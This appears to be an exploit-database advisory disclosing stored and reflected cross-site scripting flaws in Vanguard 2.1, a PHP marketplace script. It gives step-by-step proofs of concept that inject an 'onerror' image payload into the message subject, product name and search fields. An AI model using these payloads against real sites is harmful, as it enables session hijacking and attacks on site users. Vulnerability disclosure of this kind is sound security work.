Share
## https://sploitus.com/exploit?id=PACKETSTORM:157099
# Exploit Title: Vanguard 2.1 Multi XSS Vunlerabilities  
# Google Dork:N/A  
# Date: 2020-04-04  
# Exploit Author: @ThelastVvV  
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975  
# Version: 2.1  
# Tested on: 5.4.0-4parrot1-amd64  
  
---------------------------------------------------------  
  
  
Summary:  
  
Persistent Cross-site Scripting in message&product title-tags also there's Non-Persistent Cross-site scripting in product search box.  
  
PoC 1:  
  
A- Message  
  
1- create an account on vanguard marketplace  
2- go to send mail   
https://example/mails/new  
  
In the "Object" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>  
  
3-then choose the target (username ) then hit submit  
4- now go to the mailbox and click on the msg   
https://example/mails/read/1  
  
et voila xssed!  
  
PoC 2:  
  
B:Product  
  
1-go to add new product   
2- In the "Product Name" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>  
2- now view the product page  
https://example/p/(id)  
3 -click on download in the product page  
https://example/download/(id)  
  
et voila xssed!  
  
PoC 3:  
  
In Products Search box use payload:  
"><img src=x onerror=prompt(document.domain);>  
  
  
Impact:  
XSS can lead to user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical attacks on all users of the product .  
  
Screentshoots:  
  
A -https://imgur.com/jkCfaEh  
B-https://imgur.com/3GuKGJr